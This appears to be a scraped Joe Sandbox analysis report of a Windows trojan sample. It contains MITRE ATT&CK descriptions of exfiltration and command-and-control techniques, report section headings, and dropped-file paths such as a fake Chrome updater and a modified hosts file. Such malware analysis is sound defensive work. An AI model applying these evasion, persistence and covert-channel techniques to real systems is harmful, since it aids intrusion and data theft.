Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Change of critical system settings

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Change of critical system settings

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\GoogleUP\Chrome\Updater.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_juwuz4lg.oku.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwunltw0.udc.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vm0iewqp.uee.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wwzmnsne.emf.ps1

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Windows\System32\drivers\etc\hosts

C:\Windows\Temp\__PSScriptPolicyTest_00cy0hkb.aka.ps1

C:\Windows\Temp\__PSScriptPolicyTest_d0431uio.kok.psm1

C:\Windows\Temp\__PSScriptPolicyTest_qxgkd3p5.vd1.psm1

C:\Windows\Temp\__PSScriptPolicyTest_ripwaavn.dne.ps1

Windows Analysis Report
SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre